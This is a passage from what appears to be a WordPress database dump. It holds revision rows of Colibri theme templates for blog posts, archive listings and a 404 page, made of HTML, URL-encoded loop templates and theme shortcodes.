3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2231-m9%22%20class=%22style-78%20style-local-31-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22colibri-post-content%20h-global-transition-all%22%3E%5Bcolibri_post_content%5D%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%2231-m10%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-79%20style-local-31-m10%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-80-outer%20style-local-31-m11-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m11%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-80%20style-local-31-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m12%22%20class=%22h-text%20h-text-component%20style-81%20style-local-31-m12%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ECategories:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20style-82-outer%20style-local-31-m13-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-82%20style-local-31-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m14%22%20class=%22h-blog-categories%20style-83%20style-local-31-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%5Bcolibri_layout_wrapper%20name=%22tags_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%2231-m15%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-84%20style-local-31-m15%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-center%20align-items-md-center%20align-items-center%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-85-outer%20style-local-31-m16-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m16%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-85%20style-local-31-m16%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m17%22%20class=%22h-text%20h-text-component%20style-86%20style-local-31-m17%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ETags:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-87-outer%20style-local-31-m18-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m18%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-87%20style-local-31-m18%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m19%22%20class=%22h-blog-tags%20empty-preview%20style-88%20style-local-31-m19%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_tags%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22navigation_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%2231-m20%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-89%20style-local-31-m20%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-90-outer%20style-local-31-m21-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m21%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-90%20style-local-31-m21%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m22%22%20class=%22post-nav-button%20hide-title%20style-91%20style-local-31-m22%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22prev%22%20prev_post=%22Previous%20post%22%20next_post=%22Next%20post:%22%20show_title=%22false%22%20title_length=%2240%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-92-outer%20style-local-31-m23-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2231-m23%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-92%20style-local-31-m23%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2231-m24%22%20class=%22post-nav-button%20hide-title%20style-93%20style-local-31-m24%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22next%22%20prev_post=%22Previous%20post:%22%20next_post=%22Next%20post%22%20show_title=%22false%22%20title_length=%2230%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n          </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"31-m29\" id=\"comments\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-94 style-local-31-m29 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"31-m30\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-99 style-local-31-m30 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-100-outer style-local-31-m31-outer\">\n            <div data-colibri-id=\"31-m31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-100 style-local-31-m31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"31-m32\" class=\"style-101 style-local-31-m32 position-relative\">\n                  <!---->\n                  <div class=\"h-global-transition-all blog-post-comments\">[colibri_post_comments none=\"No responses yet\" one=\"One response\" multiple=\"{COMMENTS-COUNT} Responses\" disabled=\"Comments are closed\" avatar_size=\"30\"]</div>\n                </div>\n                <div data-colibri-id=\"31-m33\" class=\"position-relative\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_post_comment_form]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','main_post','','inherit','closed','closed','','31-revision-v1','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',31,'https://gsudice.dataconn.net/?p=86',0,'revision','',0),(87,1,'2022-02-15 15:45:54','2022-02-15 15:45:54','<div data-colibri-id=\"34-m1\" class=\"style-103 style-local-34-m1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"34-m2\" id=\"blog-posts\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-104 style-local-34-m2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"34-m3\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-2 gutters-row-v-3 colibri-dynamic-list style-109 style-local-34-m3 position-relative\">\n        <!---->\n        <div data-colibri-component=\"masonry\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-2 gutters-col-v-3 style-109-row style-local-34-m3-row\">\n          <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-6%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-110-outer%20style-local-34-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%2234-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-110%20style-local-34-m4%20h-overflow-hidden%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-href=%22%5Bcolibri_post_link%5D%22%20data-colibri-component=%22link%22%20%20data-colibri-id=%2234-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20style-111%20style-local-34-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-34-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22true%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m6%22%20class=%22h-row-container%20gutters-row-lg-3%20gutters-row-md-3%20gutters-row-3%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-112%20style-local-34-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-3%20gutters-col-md-3%20gutters-col-3%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-113-outer%20style-local-34-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%2234-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-113%20style-local-34-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2234-m8%22%20class=%22h-blog-meta%20style-114%20style-local-34-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m9%22%20class=%22h-blog-meta%20style-115%20style-local-34-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m10%22%20class=%22h-blog-title%20style-116%20style-local-34-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m11%22%20class=%22style-117%20style-local-34-m11%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%2216%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m12%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-118%20style-local-34-m12%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-119-outer%20style-local-34-m13-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%2234-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-119%20style-local-34-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2234-m14%22%20class=%22h-blog-meta%20style-120%20style-local-34-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%224%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_comments_url%5D%22%3E%3Cspan%20%20class=%22h-svg-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/comments%5D%3C/span%3E%5Bcolibri_post_meta_comments_content%5D%3C/a%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-121-outer%20style-local-34-m15-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%2234-m15%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-121%20style-local-34-m15%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%2234-m16%22%20class=%22h-x-container%20style-122%20style-local-34-m16%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-34-m16-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-123-outer%20style-local-34-m17-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%2234-m17%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-123%20style-local-34-m17%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-123-icon%20style-local-34-m17-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/arrow-right%5D%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n          </div>\n      </div>[colibri_layout_wrapper name=\"navigation_container\"]\n      <div data-colibri-id=\"34-m18\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-124 style-local-34-m18 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-end justify-content-md-end justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-125-outer style-local-34-m19-outer\">\n            <div data-colibri-id=\"34-m19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-125 style-local-34-m19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"34-m20\" class=\"style-126 style-local-34-m20 position-relative h-element\">\n                  <!---->\n                  <div class=\"archive-nav-button h-global-transition-all\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Previous\"]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-127-outer style-local-34-m21-outer\">\n            <div data-colibri-id=\"34-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-127 style-local-34-m21 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"34-m22\" class=\"style-128 style-local-34-m22 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-129-outer style-local-34-m23-outer\">\n            <div data-colibri-id=\"34-m23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-129 style-local-34-m23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"34-m24\" class=\"style-130 style-local-34-m24 position-relative h-element\">\n                  <!---->\n                  <div class=\"archive-nav-button h-global-transition-all\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>[/colibri_layout_wrapper]</div>\n  </div>\n</div>','main_archive','','inherit','closed','closed','','34-revision-v1','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',34,'https://gsudice.dataconn.net/?p=87',0,'revision','',0),(88,1,'2022-02-15 15:45:54','2022-02-15 15:45:54','<div data-colibri-id=\"37-m1\" class=\"style-131 style-local-37-m1 position-relative\">\n  <!---->\n  <div data-colibri-id=\"37-m2\" id=\"nothing-found\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-132 style-local-37-m2 position-relative\">\n    <!---->\n    <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n      <!---->\n      <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col-auto style-133-outer style-local-37-m3-outer\">\n        <div data-colibri-id=\"37-m3\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-133 style-local-37-m3 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"37-m4\" class=\"h-global-transition-all h-heading style-134 style-local-37-m4 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-134 style-local-37-m4\">\n                <!---->\n                <!---->\n                <h2 class=\"\">404</h2>\n              </div>\n            </div>\n            <div data-colibri-id=\"37-m5\" class=\"h-text h-text-component style-135 style-local-37-m5 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Sorry, page not found!</p>\n              </div>\n            </div>\n            <div data-colibri-id=\"37-m6\" class=\"h-x-container style-136 style-local-37-m6 position-relative h-element\">\n              <!---->\n              <div class=\"h-x-container-inner style-dynamic-37-m6-group\">\n                <!----><span class=\"h-button__outer style-137-outer style-local-37-m7-outer d-inline-flex h-element\"><a  h-use-smooth-scroll=\"true\" href=\"[colibri_home_url]\"  data-colibri-id=\"37-m7\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-137 style-local-37-m7 position-relative\"><!----><!----> <span >Go to Homepage!</span>                <span class=\"h-svg-icon h-button__icon style-137-icon style-local-37-m7-icon\"><!--Icon by Icons8 Line Awesome (https://icons8.com/line-awesome)-->[colibri_svg_icon name=icons8-line-awesome/arrow-right]</span></a>\n                </span>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','main_404','','inherit','closed','closed','','37-revision-v1','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',37,'https://gsudice.dataconn.net/?p=88',0,'revision','',0),(89,1,'2022-02-15 15:45:54','2022-02-15 15:45:54','<div data-colibri-id=\"40-m1\" class=\"style-138 style-local-40-m1 position-relative\">\n  <!---->\n  <div data-colibri-id=\"40-m2\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-3 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-3 gutters-row-v-3 colibri-dynamic-list style-139 style-local-40-m2 position-relative\">\n    <!---->\n    <div data-colibri-component=\"\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-3 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-3 gutters-col-v-3 style-139-row style-local-40-m2-row\">\n      <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-140-outer%20style-local-40-m3-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%2240-m3%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-140%20style-local-40-m3%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%2240-m4%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-141%20style-local-40-m4%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-co